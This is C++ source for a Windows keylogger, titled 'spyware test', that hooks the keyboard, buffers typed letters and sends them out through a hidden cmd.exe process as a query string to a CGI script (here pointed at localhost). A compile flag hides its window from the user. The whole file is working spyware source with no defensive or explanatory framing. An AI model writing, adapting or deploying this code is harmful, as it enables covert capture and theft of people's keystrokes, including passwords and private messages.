#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include "keyhook.h"

#pragma comment(lib, "WSock32.lib")
#pragma comment(lib, "keylog.lib")

#define TEXT_SIZE        (15)
#define HOST_NAME        "localhost"
#define FILE_PATH        "/save.cgi"
#define FILE_TITLE       "spyware test"
#define PRGRM_NAME       "get"

LPCTSTR szWindowClass = TEXT(CLASS_NAME);
LPCTSTR szTitle       = TEXT(TITLE_NAME);

//#define HIDE

HINSTANCE hInst;

ATOM                MyRegisterClass(HINSTANCE hInstance);
BOOL                InitInstance(HINSTANCE, int);
LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);

BOOL                SendLogData(char *MainMemory, UINT len);

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
     MSG msg;

    MyRegisterClass(hInstance);

    if (!InitInstance (hInstance, nCmdShow)) 
    {
        return FALSE;
    }

    BOOL bRet;
    while ((bRet = GetMessage(&msg, NULL, 0, 0)) != 0) 
    {
        if(bRet == -1)
        {
            break;
        }

        if (!TranslateAccelerator(msg.hwnd, NULL, &msg)) 
        {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
    }

    return (int) msg.wParam;
}



ATOM MyRegisterClass(HINSTANCE hInstance)
{
    WNDCLASSEX wcex;

    wcex.cbSize = sizeof(WNDCLASSEX); 

    wcex.style             = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc       = (WNDPROC)WndProc;
    wcex.cbClsExtra        = 0;
    wcex.cbWndExtra        = 0;
    wcex.hInstance         = hInstance;
    wcex.hIcon             = LoadIcon(hInstance, NULL);
    wcex.hCursor           = LoadCursor(NULL, IDC_ARROW);
    wcex.hbrBackground     = (HBRUSH)(COLOR_WINDOW+1);
    wcex.lpszMenuName      = (LPCTSTR)NULL;
    wcex.lpszClassName     = szWindowClass;
    wcex.hIconSm           = LoadIcon(wcex.hInstance, NULL);

    return RegisterClassEx(&wcex);
}



BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
   HWND hWnd;

   hInst = hInstance;

   hWnd = CreateWindow(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
      CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);

   if (!hWnd)
   {
      return FALSE;
   }

#ifndef HIDE
   ShowWindow(hWnd, nCmdShow);
   UpdateWindow(hWnd);
#endif

   return TRUE;
}



LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    static char MainMemory[TEXT_SIZE + 1];
    static int len = 0;

    char c;

    switch (message) 
    {
    case WM_CREATE:
        if(MySetHook()) { DestroyWindow(hWnd); }
        break;
    case WM_KEYHOOK:
        c = (char)wParam;
        if(c >= 'A' && c <= 'Z') { MainMemory[len] = c, len++; }
        if( !(TEXT_SIZE > len) ){
            if(SendLogData(MainMemory, len)){
                DestroyWindow(hWnd);
            }
            len = 0;
        }
        break;
    case WM_DESTROY:
        MyEndHook();
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}



BOOL SendLogData(char *MainMemory, UINT len)
{
    HANDLE pfd_in[2], pfd_out[2];
    HANDLE fd_read, fd_write;
    short int R = 0, W = 1;
    
    SECURITY_ATTRIBUTES SA;
    SA.lpSecurityDescriptor = NULL;
    SA.bInheritHandle       = TRUE;
    SA.nLength              = sizeof(SA);

    HANDLE hParent = GetCurrentProcess();

    CreatePipe(&pfd_out[R], &pfd_out[W], &SA, 0);
    DuplicateHandle(hParent, pfd_out[R],
        hParent, &fd_write, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_out[R]);

    CreatePipe(&pfd_in[R], &pfd_in[W], &SA, 0);
    DuplicateHandle(hParent, pfd_in[W],
        hParent, &fd_read, 0, FALSE, DUPLICATE_SAME_ACCESS);
    CloseHandle(pfd_in[W]);
    
    STARTUPINFO SI;
    ZeroMemory(&SI, sizeof(SI));
    SI.cb          = sizeof(SI);
    SI.dwFlags     = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    SI.wShowWindow = SW_HIDE;
    SI.hStdInput   = pfd_in[R];
    SI.hStdOutput  = pfd_out[W];
    SI.hStdError   = pfd_out[W];

    PROCESS_INFORMATION PI;
    if(CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 
        0, NULL, NULL, &SI, &PI) != TRUE){
            CloseHandle(fd_read);
            CloseHandle(fd_write);
            CloseHandle(pfd_in[R]);
            CloseHandle(pfd_out[W]);
            return TRUE;
    }

    CloseHandle(pfd_in[R]);
    CloseHandle(pfd_out[W]);

    int SendAllDataLen;
    SendAllDataLen  = (int)strlen(PRGRM_NAME);
    SendAllDataLen += (int)strlen(HOST_NAME);
    SendAllDataLen += (int)strlen(FILE_PATH);
    SendAllDataLen += len;

    char *SendAllData = new char[SendAllDataLen + 16];

    wsprintf(SendAllData,
        "%s http://%s%s?%s\r\n",
        TEXT(PRGRM_NAME), TEXT(HOST_NAME),
        TEXT(FILE_PATH), MainMemory);

    DWORD sLen;
    WriteFile(fd_read, SendAllData, (int)strlen(SendAllData), &sLen, NULL);
    FlushFileBuffers(fd_read);

    WriteFile(fd_read, "exit\r\n", 6, &sLen, NULL);
    FlushFileBuffers(fd_read);

    WaitForSingleObject(PI.hProcess, 3000);

    CloseHandle(PI.hProcess);
    CloseHandle(fd_write);
    CloseHandle(fd_read);

    delete []SendAllData;
    return FALSE;
}